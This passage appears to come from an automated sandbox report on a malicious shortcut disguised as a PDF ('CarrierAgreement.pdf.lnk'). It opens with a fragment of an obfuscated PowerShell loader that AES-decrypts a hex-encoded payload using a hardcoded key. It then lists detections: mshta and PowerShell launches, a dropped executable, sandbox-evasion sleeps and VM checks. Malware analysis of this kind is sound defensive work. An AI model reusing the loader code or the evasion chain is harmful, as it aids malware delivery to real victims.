747B9168AACC8B7730C50B98B31A5E95CF43E58AB8DA6BF46550035D830DBF8CE8A450849D09E261020820A3C898AC6BC7CA589994D1A7BC6CBB01495D1CA57D60B1E68AF9D1E53C5BD5310153FC3E2B8DFD9D910AA312BC6C305AA7DE3E6C1D1689D0E1B54ECBA688DB6977B50F8ADB1C843896B619A4C1C88BC05BA171BAF12FB0751D9425C26258CBB29B82CA964FDCFBB779D338C140E4B54AD473109871DA665A1028B5489F2936C002C23995EAAD75FAEC7D1C23658D72E5BCA801DBF50A83D1585FB03487AACBE213CBFBAF54DDF43E0CC1780607030370FD254E6D185EC019BED40DF3A26364E22144A3A2AB186D06DF0AF4FE35CA93D05915D6D6D7D3C7A54F25E18421320862CE1CC9B0C7B510C13A30A01950668FE380F154C133E73AB0E0C92A044F3669BE276DD745D220149675000E09D63EE960879409BFEDEDA3483BC1079257FCEC92518331731EBF09B0068461A60C6FE5450A668155187769B3714F8674259AE2383B26BFC047B3345B4B1A2E81BC4ACC879B282641BEA83118BD16A91C3FB040349F9A220F52F0A904E971C68A8B7AE7F5860034B22033F31CAF74B121D6F0672EDF133C9764CF0B79274ADA57554D5617BDEB924FDD1A69B7BCA18D34E108B89C42EAF960A2FE309D50F3E17C6EC586E0EF4646E2D418053C151C42EA1E041F414D94AAEC7DCA3D6086FEFF2D608A4D5DEA1B781AEA3109FCF4EF60DBA03DCB649FE16896B50AED1F8D5319155B11B14787101FA727118B88D50589B74206D84CD45A5FFF0653B0DC3265B92186DA8EAE07E65D0B6F1F9562421931175ADCDB8346280E92044D6DF6C3D7D6C52C1B0961211A8CD2138E79D9387D320F595E3DFFAC8D1B0D2636413271E4DC4BF7316364061FF4C0A348C05FDFAAE265E971340F850E916C6EDEF9420625A4401A18306FFA9047A91CDEAD91F699FE8D0055E27192A17C38DCBCEA41A83C4E3158F4D0F8634F43AC1CAAE822B7E6');$VTjxj = [System.Security.Cryptography.Aes]::Create();$VTjxj.Key = aaTynIUh('7566656A62656D6D6241736C57716B6A');$VTjxj.IV = New-Object byte[] 16;$paOghKFl = $VTjxj.CreateDecryptor();$EkiGvPGrs = $paOghKFl.TransformFinalBlock($VuCCamL, 0, $VuCCamL.Length);$NvSFUKzSO = [System.Text.Encoding]::Utf Jump to behavior
PE file contains an invalid checksum
Source: carrieragreement[1].3.dr Static PE information: real checksum: 0x81bf should be: 0x2e8df
PE file contains sections with non-standard names
Source: SmartyUninstaller4.exe.5.dr Static PE information: section name: .didata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A8802D push eax; ret 15_2_02A88033

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\mshta.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\carrieragreement[1] Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\carrieragreement[1] Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\agreement.pdf Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.lnk Static PE information: CarrierAgreement.pdf.lnk.mal.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2663 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 736 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3509 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6363 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\carrieragreement[1] Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep count: 2663 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep count: 736 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7800 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe TID: 9088 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe TID: 9088 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: mshta.exe, 00000003.00000003.2275262415.000002A344A9D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000003.00000002.2280014785.0000029B42762000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42762000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: mshta.exe, 00000003.00000003.2276744476.0000029B427C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2280014785.0000029B42787000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2278880978.0000029B42787000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2280250453.0000029B427C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2921732063.000001463A85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2920180621.000001463522B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AB6B90 LdrInitializeThunk, 15_2_02AB6B90
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D05A9 mov edx, dword ptr fs:[00000030h] 15_2_006D05A9
